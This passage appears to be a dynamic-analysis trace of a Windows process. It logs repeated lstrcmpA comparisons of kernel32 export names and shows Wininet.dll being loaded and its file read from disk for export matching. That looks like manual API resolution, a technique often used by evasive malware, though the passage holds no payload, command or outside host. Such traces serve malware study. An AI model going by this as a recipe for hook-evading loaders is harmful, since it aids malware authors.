returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.921] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0154.921] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0154.922] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0154.922] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0154.923] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0154.923] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0154.923] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0154.923] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0154.923] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0154.923] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0154.923] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0154.923] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0154.923] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0154.923] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0154.924] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.924] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.924] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.924] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0154.924] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0154.924] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0154.924] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0154.924] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0154.925] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0154.925] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0154.925] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0154.925] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0154.925] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0154.925] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0154.926] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0154.926] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0154.927] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0154.927] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0154.928] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0154.931] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0154.932] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0155.756] GetProcessHeap () returned 0x450000 [0155.756] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47c5f0 | out: hHeap=0x450000) returned 1 [0155.756] GetProcessHeap () returned 0x450000 [0155.756] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469020 [0155.758] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0155.853] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0155.853] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0155.853] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0155.853] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0155.853] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0155.854] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0155.854] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0155.854] GetProcessHeap () returned 0x450000 [0155.854] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x286600) returned 0x4100040 [0155.860] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0155.860] ReadFile (in: hFile=0x140, lpBuffer=0x4100040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4100040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0156.068] CloseHandle (hObject=0x140) returned 1 [0156.069] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0156.069] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0156.069] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0156.069] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0156.069] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0156.069] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0156.069] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0156.070] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0156.070] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0156.070] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0156.070] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0156.071] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.071] lstrcmpA 